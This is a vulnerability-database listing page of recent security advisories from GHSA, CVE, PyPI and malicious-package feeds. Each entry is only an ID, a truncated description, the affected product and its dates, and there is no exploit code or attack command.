Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-mp7c-m3rh-r56v matrix-js-sdk has insufficient validation when considering a room to be upgraded by another 2025-09-16T20:18:57Z 2025-09-22T22:59:23Z
ghsa-2h8j-8r9p-849f @digitalocean/do-markdownit has Type Confusion vulnerability 2025-09-19T06:31:21Z 2025-09-22T22:55:37Z
ghsa-33vc-wfww-vjfv jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin 2025-09-11T06:30:23Z 2025-09-22T22:45:32Z
ghsa-wq2j-w9pm-7x2p DNN allows loading unused themes on anonymous clients through query parameters 2025-09-22T21:10:20Z 2025-09-22T21:59:35Z
ghsa-j2xj-h7w5-r7vp Mailgen: HTML injection vulnerability in plaintext e-mails 2025-09-22T18:03:47Z 2025-09-22T21:59:19Z
ghsa-vh25-5764-9wcr @conventional-changelog/git-client has Argument Injection vulnerability 2025-09-22T18:01:01Z 2025-09-22T21:59:10Z
ghsa-w5fx-fh39-j5rw Codex has sandbox bypass due to bug in path configuration logic 2025-09-19T17:14:04Z 2025-09-22T21:59:01Z
ghsa-3wfh-36rx-9537 Timing Attack Vulnerability in SCRAM Authentication 2025-09-16T22:20:08Z 2025-09-22T21:58:53Z
ghsa-3gcm-f6qx-ff7p Flowise has Remote Code Execution vulnerability 2025-09-15T19:59:57Z 2025-09-22T21:58:42Z
ghsa-hr92-4q35-4j3m FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability 2025-09-15T19:53:46Z 2025-09-22T21:58:31Z
ghsa-vh3f-qppr-j97f Mesh Connect JS SDK Vulnerable to Cross Site Scripting via createLink.openLink 2025-09-22T21:09:27Z 2025-09-22T21:58:19Z
ghsa-7rcc-q6rq-jpcm DNN affected by Stored Cross-Site Scripting (XSS) in Profile Biography field 2025-09-22T21:51:04Z 2025-09-22T21:51:04Z
ghsa-4pfg-2mw5-f8jx Cloudflare Vite plugin exposes secrets over the built-in dev server 2025-07-08T19:07:47Z 2025-09-22T21:39:42Z
ghsa-xxcq-47cq-jxjh A restriction bypass vulnerability in is-localhost-ip could allow attackers to perform Server-Side … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-w8hv-cgf2-4jv9 A vulnerability was found in code-projects Hostel Management System 1.0. Affected is an unknown fun… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-w85c-w3c2-gf9p A vulnerability was determined in D-Link DIR-823X 240126/240802/250416. Affected by this vulnerabil… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-v964-jqg6-qgw6 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-rcqp-6524-9x7r Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-q7jf-phpc-j8cf Stocky POS with Inventory Management & HRM (ui-lib) version 5.0 is affected by a Stored Cross-Site … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-q796-m2gh-m8mm Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-pwcr-rqrx-fj4m A maliciously crafted PRT file, when parsed through certain Autodesk products, can force a Memory C… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-p549-v45c-9xxx MagicProject AI version 9.1 is affected by a Cross-Site Scripting (XSS) vulnerability within the ch… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-p46h-w854-gfv3 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnera… 2025-09-22T21:30:28Z 2025-09-22T21:30:29Z
ghsa-jg68-2889-xc9w Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusi… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-hg76-7mqw-rg32 Missing Authorization vulnerability in AdvancedCoding wpDiscuz allows Exploiting Incorrectly Config… 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-h8pp-4fj9-6rjr Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-g48j-frfg-4rv3 Missing Authorization vulnerability in Stylemix MasterStudy LMS allows Exploiting Incorrectly Confi… 2025-09-22T21:30:28Z 2025-09-22T21:30:29Z
ghsa-frxp-hx27-j39r Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Darren … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-c7xv-xc8m-48fq Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
ghsa-8pjc-487g-w6p2 When using http.CrossOriginProtection, the AddInsecureBypassPattern method can unexpectedly bypass … 2025-09-22T21:30:29Z 2025-09-22T21:30:29Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-10823 axboe fio options.c str_buffer_pattern_cb null pointer… axboe
fio
2025-09-22T23:32:10.940Z 2025-09-22T23:32:10.940Z
cve-2025-10822 fuyang_lipengjun platform queryAll SysSmsLogController… fuyang_lipengjun
platform
2025-09-22T23:32:07.527Z 2025-09-22T23:32:07.527Z
cve-2025-10821 fuyang_lipengjun platform queryAll TopicCategoryContro… fuyang_lipengjun
platform
2025-09-22T23:02:09.848Z 2025-09-22T23:02:09.848Z
cve-2025-43814 6.9 (v4.0) In Liferay Portal 7.4.0 through 7.4.3.112, and ol… Liferay
Portal
2025-09-22T23:01:21.493Z 2025-09-22T23:01:21.493Z
cve-2025-10820 fuyang_lipengjun platform queryAll TopicController imp… fuyang_lipengjun
platform
2025-09-22T22:32:11.810Z 2025-09-22T22:32:11.810Z
cve-2025-10819 fuyang_lipengjun platform queryAll UserCouponControlle… fuyang_lipengjun
platform
2025-09-22T22:32:08.050Z 2025-09-22T22:32:08.050Z
cve-2025-43810 5.3 (v4.0) Insecure Direct Object Reference (IDOR) vulnerabi… Liferay
Portal
2025-09-22T22:29:45.611Z 2025-09-22T22:29:45.611Z
cve-2025-10817 Campcodes Online Learning Management System admin_user… Campcodes
Online Learning Management System
2025-09-22T22:02:06.681Z 2025-09-22T22:02:06.681Z
cve-2025-43806 5.3 (v4.0) Batch Engine in Liferay Portal 7.4.0 through 7.4.… Liferay
Portal
2025-09-22T21:48:13.811Z 2025-09-22T21:48:13.811Z
cve-2025-10816 Jinher OA XML text xml external entity reference Jinher
OA
2025-09-22T21:32:07.896Z 2025-09-22T21:32:07.896Z
cve-2025-10815 Tenda AC20 HTTP POST Request SetPptpServerCfg strcpy b… Tenda
AC20
2025-09-22T21:02:08.431Z 2025-09-22T21:02:08.431Z
cve-2025-47910 N/A CrossOriginProtection insecure bypass patterns not lim… Go standard library
net/http
2025-09-22T21:01:55.440Z 2025-09-22T21:01:55.440Z
cve-2025-59535 DotNetNuke.Core allows loading of unused themes on ano… dnnsoftware
Dnn.Platform
2025-09-22T20:59:03.801Z 2025-09-22T20:59:03.801Z
cve-2025-57204 N/A Stocky POS with Inventory Management & HRM (ui-li… n/a
n/a
2025-09-22T00:00:00.000Z 2025-09-22T20:41:04.466Z
cve-2025-57205 N/A iNiLabs School Express (SMS Express) 6.2 is affec… n/a
n/a
2025-09-22T00:00:00.000Z 2025-09-22T20:32:30.676Z
cve-2025-8892 7.8 (v3.1) PRT File Parsing Memory Corruption Vulnerability Autodesk
Shared Components
2025-09-22T19:01:28.720Z 2025-09-22T20:32:23.204Z
cve-2025-10814 D-Link DIR-823X goahead command injection D-Link
DIR-823X
2025-09-22T20:32:09.997Z 2025-09-22T20:32:09.997Z
cve-2025-36064 5.9 (v3.1) IBM Sterling Connect:Express for Microsoft Windows inf… IBM
Sterling Connect:Express for Microsoft Windows
2025-09-22T18:25:38.219Z 2025-09-22T20:29:49.385Z
cve-2025-10813 code-projects Hostel Management System index.php sql i… code-projects
Hostel Management System
2025-09-22T20:02:05.881Z 2025-09-22T20:27:56.750Z
cve-2025-59532 Codex has sandbox bypass due to bug in path configurat… openai
codex
2025-09-22T20:26:42.712Z 2025-09-22T20:26:42.712Z
cve-2025-59527 FlowiseAI/Flowise has Server-Side Request Forgery (SSR… FlowiseAI
Flowise
2025-09-22T19:48:42.436Z 2025-09-22T20:25:56.571Z
cve-2025-59528 Flowise has Remote Code Execution vulnerability FlowiseAI
Flowise
2025-09-22T19:54:58.196Z 2025-09-22T20:24:09.883Z
cve-2025-10810 Campcodes Online Learning Management System edit_user.… Campcodes
Online Learning Management System
2025-09-22T18:32:06.813Z 2025-09-22T19:57:30.193Z
cve-2025-10811 code-projects Hostel Management System index.php sql i… code-projects
Hostel Management System
2025-09-22T19:02:06.681Z 2025-09-22T19:54:55.158Z
cve-2025-10812 code-projects Hostel Management System index.php sql i… code-projects
Hostel Management System
2025-09-22T19:32:05.935Z 2025-09-22T19:52:28.555Z
cve-2025-59434 Critical Multi-Tenant Variable Disclosure in Flowise C… FlowiseAI
Flowise
2025-09-22T19:39:03.774Z 2025-09-22T19:47:56.540Z
cve-2025-59526 Mailgen: HTML injection vulnerability in plaintext e-mails eladnava
mailgen
2025-09-22T19:27:53.323Z 2025-09-22T19:45:47.069Z
cve-2025-59430 Mesh Connect JS SDK Vulnerable to Cross Site Scripting… FrontFin
mesh-web-sdk
2025-09-22T18:47:04.643Z 2025-09-22T19:43:47.837Z
cve-2025-59433 @conventional-changelog/git-client has an Argument Inj… conventional-changelog
conventional-changelog
2025-09-22T19:14:54.237Z 2025-09-22T19:41:56.799Z
cve-2025-59432 Timing Attack Vulnerability in SCRAM Authentication ongres
scram
2025-09-22T19:22:37.117Z 2025-09-22T19:40:11.294Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-43814 6.9 (v4.0) In Liferay Portal 7.4.0 through 7.4.3.112, and ol… Liferay
Portal
2025-09-22T23:01:21.493Z 2025-09-22T23:01:21.493Z
cve-2025-43810 5.3 (v4.0) Insecure Direct Object Reference (IDOR) vulnerabi… Liferay
Portal
2025-09-22T22:29:45.611Z 2025-09-22T22:29:45.611Z
cve-2025-10821 fuyang_lipengjun platform queryAll TopicCategoryContro… fuyang_lipengjun
platform
2025-09-22T23:02:09.848Z 2025-09-22T23:02:09.848Z
cve-2025-10820 fuyang_lipengjun platform queryAll TopicController imp… fuyang_lipengjun
platform
2025-09-22T22:32:11.810Z 2025-09-22T22:32:11.810Z
cve-2025-10819 fuyang_lipengjun platform queryAll UserCouponControlle… fuyang_lipengjun
platform
2025-09-22T22:32:08.050Z 2025-09-22T22:32:08.050Z
cve-2025-43806 5.3 (v4.0) Batch Engine in Liferay Portal 7.4.0 through 7.4.… Liferay
Portal
2025-09-22T21:48:13.811Z 2025-09-22T21:48:13.811Z
cve-2025-10817 Campcodes Online Learning Management System admin_user… Campcodes
Online Learning Management System
2025-09-22T22:02:06.681Z 2025-09-22T22:02:06.681Z
cve-2025-10816 Jinher OA XML text xml external entity reference Jinher
OA
2025-09-22T21:32:07.896Z 2025-09-22T21:32:07.896Z
cve-2025-9949 Internal Links Manager <= 3.0.1 - Cross-Site Request Forgery webraketen
Internal Links Manager
2025-09-20T04:27:56.609Z 2025-09-22T15:05:21.542Z
cve-2025-9887 Custom Login And Signup Widget <= 1.0 - Cross-Site Req… bittokazi
Custom Login And Signup Widget
2025-09-20T06:43:20.390Z 2025-09-22T14:53:57.815Z
cve-2025-9883 Browser Sniff <= 2.3 - Cross-Site Request Forgery to S… bpedrassani
Browser Sniff
2025-09-20T06:43:19.926Z 2025-09-22T14:55:58.676Z
cve-2025-9882 osTicket WP Bridge <= 1.9.2 - Cross-Site Request Forge… michaelbo
osTicket WP Bridge
2025-09-20T06:43:19.442Z 2025-09-22T15:00:11.042Z
cve-2025-9081 3.1 (v3.1) IDOR in board file download allows any user to downloa… Mattermost
Mattermost
2025-09-19T19:36:14.702Z 2025-09-19T19:52:03.664Z
cve-2025-9079 8 (v3.1) Admin RCE via prepackaged plugins by way of misconfigu… Mattermost
Mattermost
2025-09-19T19:22:00.288Z 2025-09-20T03:55:43.405Z
cve-2025-6544 Deserialization Vulnerability in h2oai/h2o-3 h2oai
h2oai/h2o-3
2025-09-21T09:00:09.724Z 2025-09-22T17:23:25.409Z
cve-2025-59689 Libraesva ESG 4.5 through 5.5.x before 5.5.7 allo… Libraesva
Email Security Gateway
2025-09-19T00:00:00.000Z 2025-09-19T20:17:52.557Z
cve-2025-59431 MapServer - WFS XML Filter Query SQL injection MapServer
MapServer
2025-09-19T19:29:13.163Z 2025-09-19T19:42:16.930Z
cve-2025-59427 Cloudflare vite plugin exposes secrets over the built-… cloudflare
workers-sdk
2025-09-19T15:30:10.139Z 2025-09-19T16:05:12.864Z
cve-2025-59344 AliasVault Vulnerable to Server-Side Request Forgery v… aliasvault
aliasvault
2025-09-19T15:21:19.533Z 2025-09-19T16:08:33.661Z
cve-2025-57644 N/A Accela Automation Platform 22.2.3.0.230103 contai… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T15:54:58.327Z
cve-2025-57396 N/A Tandoor Recipes 2.0.0-alpha-1, fixed in 2.0.0-alp… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T20:17:08.121Z
cve-2025-57296 N/A Tenda AC6 router firmware 15.03.05.19 contains a … n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T17:58:17.915Z
cve-2025-56869 N/A Directory traversal vulnerability in Sync In serv… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T17:57:08.429Z
cve-2025-56762 N/A Paracrawl KeOPs v2 is vulnerable to Cross Site Sc… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T20:16:03.567Z
cve-2025-55910 N/A CMSEasy v7.7.8.0 and before is vulnerable to Arbi… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T16:00:09.920Z
cve-2025-54815 N/A Server-side template injection (SSTI) vulnerabili… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T20:05:39.385Z
cve-2025-54761 N/A An issue was discovered in PPress 0.0.9 allowing … n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T20:13:18.490Z
cve-2025-53692 7.1 (v3.1) Sitecore Experience Platform Cross-Site Scripting Vuln… Sitecore
Sitecore Experience Manager (XM)
2025-09-21T19:42:46.643Z 2025-09-22T17:27:11.080Z
cve-2025-52159 N/A Hardcoded credentials in default configuration of… n/a
n/a
2025-09-19T00:00:00.000Z 2025-09-19T20:17:37.649Z
cve-2025-48703 CWP (aka Control Web Panel or CentOS Web Panel) b… centos-webpanel
CentOS Web Panel
2025-09-19T00:00:00.000Z 2025-09-19T18:41:11.630Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2025-9949 The Internal Links Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all … 2025-09-20T05:15:35.840 2025-09-22T21:23:01.543
fkie_cve-2025-9887 The Custom Login And Signup Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery… 2025-09-20T07:15:36.513 2025-09-22T21:23:01.543
fkie_cve-2025-9883 The Browser Sniff plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions … 2025-09-20T07:15:36.297 2025-09-22T21:23:01.543
fkie_cve-2025-9882 The osTicket WP Bridge plugin for WordPress is vulnerable to Cross-Site Request Forgery in all vers… 2025-09-20T07:15:36.077 2025-09-22T21:23:01.543
fkie_cve-2025-9081 Mattermost versions 10.5.x <= 10.5.8, 9.11.x <= 9.11.17 fail to properly validate access controls w… 2025-09-19T20:15:40.807 2025-09-22T21:23:01.543
fkie_cve-2025-9079 Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.10.x <= 10.10.1, 10.9… 2025-09-19T20:15:40.540 2025-09-22T21:23:01.543
fkie_cve-2025-6544 A deserialization vulnerability exists in h2oai/h2o-3 versions <= 3.46.0.8, allowing attackers to r… 2025-09-21T09:15:38.497 2025-09-22T21:23:01.543
fkie_cve-2025-59689 Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attac… 2025-09-19T20:15:40.340 2025-09-22T21:23:01.543
fkie_cve-2025-59431 MapServer is a system for developing web-based GIS applications. Prior to 8.4.1, the XML Filter Que… 2025-09-19T20:15:40.177 2025-09-22T21:23:01.543
fkie_cve-2025-59427 The Cloudflare Vite plugin enables a full-featured integration between Vite and the Workers runtime… 2025-09-19T16:15:46.563 2025-09-22T21:23:01.543
fkie_cve-2025-59344 AliasVault is a privacy-first password manager with built-in email aliasing. A server-side request … 2025-09-19T16:15:46.383 2025-09-22T21:23:01.543
fkie_cve-2025-57644 Accela Automation Platform 22.2.3.0.230103 contains multiple vulnerabilities in the Test Script fea… 2025-09-19T16:15:46.220 2025-09-22T21:23:01.543
fkie_cve-2025-57396 Tandoor Recipes 2.0.0-alpha-1, fixed in 2.0.0-alpha-2, is vulnerable to privilege escalation. This … 2025-09-19T20:15:40.043 2025-09-22T21:23:01.543
fkie_cve-2025-57296 Tenda AC6 router firmware 15.03.05.19 contains a command injection vulnerability in the formSetIptv… 2025-09-19T16:15:46.107 2025-09-22T21:23:01.543
fkie_cve-2025-56869 Directory traversal vulnerability in Sync In server thru 1.1.1 allowing authenticated attackers to … 2025-09-19T16:15:45.953 2025-09-22T21:23:01.543
fkie_cve-2025-56762 Paracrawl KeOPs v2 is vulnerable to Cross Site Scripting (XSS) in error.php. 2025-09-19T20:15:39.897 2025-09-22T21:23:01.543
fkie_cve-2025-55910 CMSEasy v7.7.8.0 and before is vulnerable to Arbitrary file deletion in database_admin.php. 2025-09-19T16:15:45.780 2025-09-22T21:23:01.543
fkie_cve-2025-54815 Server-side template injection (SSTI) vulnerability in PPress 0.0.9 allows attackers to execute arb… 2025-09-19T20:15:39.710 2025-09-22T21:23:01.543
fkie_cve-2025-54761 An issue was discovered in PPress 0.0.9 allowing attackers to gain escilated privlidges via crafted… 2025-09-19T20:15:39.580 2025-09-22T21:23:01.543
fkie_cve-2025-53692 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnera… 2025-09-21T20:15:37.440 2025-09-22T21:23:01.543
fkie_cve-2025-52159 Hardcoded credentials in default configuration of PPress 0.0.9. 2025-09-19T20:15:39.453 2025-09-22T21:23:01.543
fkie_cve-2025-48703 CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote cod… 2025-09-19T18:15:36.620 2025-09-22T21:23:01.543
fkie_cve-2025-43809 Cross-Site Request Forgery (CSRF) vulnerability in the server (license) registration page in Lifera… 2025-09-19T20:15:39.293 2025-09-22T21:23:01.543
fkie_cve-2025-43808 The Commerce component in Liferay Portal 7.3.0 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through… 2025-09-19T21:15:35.640 2025-09-22T21:23:01.543
fkie_cve-2025-43803 Insecure direct object reference (IDOR) vulnerability in the Contacts Center widget in Liferay Port… 2025-09-19T19:15:41.770 2025-09-22T21:23:01.543
fkie_cve-2025-40925 Starch versions 0.14 and earlier generate session ids insecurely. The default session id generator… 2025-09-20T13:15:34.920 2025-09-22T21:23:01.543
fkie_cve-2025-39866 In the Linux kernel, the following vulnerability has been resolved: fs: writeback: fix use-after-f… 2025-09-19T16:15:45.657 2025-09-22T21:23:01.543
fkie_cve-2025-39865 In the Linux kernel, the following vulnerability has been resolved: tee: fix NULL pointer derefere… 2025-09-19T16:15:45.540 2025-09-22T21:23:01.543
fkie_cve-2025-39864 In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: fix use-after-… 2025-09-19T16:15:45.420 2025-09-22T21:23:01.543
fkie_cve-2025-39863 In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: fix use-after-… 2025-09-19T16:15:45.310 2025-09-22T21:23:01.543
Vulnerabilities are sorted by update time (recent to old).
ID Description Package Published Updated
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-09T08:24:31.312725Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-09T08:24:31.164697Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-09T08:24:31.044711Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB… mindsdb 2024-09-12T13:15:00Z 2025-09-09T08:24:30.947511Z
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1… mindsdb 2023-12-11T21:15:00Z 2025-09-09T08:24:30.817251Z
pysec-2025-52 gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation. mlflow 2025-06-23T15:15:29Z 2025-08-28T06:24:53.410404Z
pysec-2025-72 The `num2words` project was compromised via a phishing attack and two new versions were u… num2words 2025-07-31T14:34:47+00:00
pysec-2025-71 Cadwyn creates production-ready community-driven modern Stripe-like API versioning in Fas… cadwyn 2025-07-21T21:15:25+00:00 2025-07-23T15:24:03.825615+00:00
pysec-2025-70 A Server-Side Request Forgery (SSRF) vulnerability exists in the RequestsToolkit componen… langchain-community 2025-06-23T21:15:25+00:00 2025-07-16T21:23:40.211079+00:00
pysec-2024-259 In PyTorch <=2.4.1, the RemoteModule has Deserialization RCE. NOTE: this is disputed by m… torch 2024-10-29T21:15:04+00:00 2025-07-16T03:09:57.748865+00:00
pysec-2024-258 In scrapy/scrapy, an issue was identified where the Authorization header is not removed d… scrapy 2024-05-20T08:15:08+00:00 2025-07-15T17:37:50.051730+00:00
pysec-2025-69 In Roundup before 2.5.0, XSS can occur via interaction between URLs and issue tracker tem… roundup 2025-07-13T20:15:25+00:00 2025-07-13T21:23:01.161315+00:00
pysec-2025-68 A vulnerability, which was classified as critical, has been found in Upsonic up to 0.55.6… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.449399+00:00
pysec-2025-67 A vulnerability classified as critical was found in Upsonic up to 0.55.6. This vulnerabil… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.385619+00:00
pysec-2025-66 Improper privilege management in a REST interface allowed registered users to access unau… streampipes 2025-03-03T11:15:11+00:00 2025-07-08T15:23:46.628375+00:00
pysec-2025-65 A path traversal vulnerability exists in run-llama/llama_index versions 0.12.27 through 0… llama-index 2025-07-07T13:15:28+00:00 2025-07-07T15:23:42.730681+00:00
pysec-2025-61 Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap … pillow 2025-07-01T19:15:27Z 2025-07-07T14:12:46.226030Z
pysec-2025-64 A vulnerability classified as critical has been found in themanojdesai python-a2a up to 0… python-a2a 2025-06-17T07:15:18+00:00 2025-07-02T21:23:13.806273+00:00
pysec-2025-63 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Whe… vllm 2025-03-19T16:15:32+00:00 2025-07-01T23:22:49.176005+00:00
pysec-2025-62 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Mal… vllm 2025-02-07T20:15:34+00:00 2025-07-01T23:22:49.083695+00:00
pysec-2025-60 Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Inform… apache-iotdb 2025-05-14T11:16:28+00:00 2025-07-01T21:22:47.232036+00:00
pysec-2025-59 Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attack… apache-iotdb 2025-05-14T11:15:47+00:00 2025-07-01T21:22:47.177405+00:00
pysec-2024-257 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-03-22T23:15:07+00:00 2025-06-30T15:23:50.085549+00:00
pysec-2025-58 vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py impl… vllm 2025-01-27T18:15:41+00:00 2025-06-27T21:22:36.583615+00:00
pysec-2025-57 A Denial of Service (DoS) vulnerability in zenml-io/zenml version 0.66.0 allows unauthent… zenml 2025-03-20T10:15:48+00:00 2025-06-27T17:22:55.175431+00:00
pysec-2025-56 OctoPrint provides a web interface for controlling consumer 3D printers. In versions up t… octoprint 2025-04-22T18:15:59+00:00 2025-06-27T17:22:53.513680+00:00
pysec-2024-256 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-12-03T16:15:24+00:00 2025-06-27T17:22:53.325430+00:00
pysec-2025-55 vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 u… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.407481+00:00
pysec-2025-54 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.319321+00:00
pysec-2025-53 vLLM is an inference and serving engine for large language models (LLMs). Prior to versio… vllm 2025-05-29T17:15:21+00:00 2025-06-26T21:23:06.231251+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
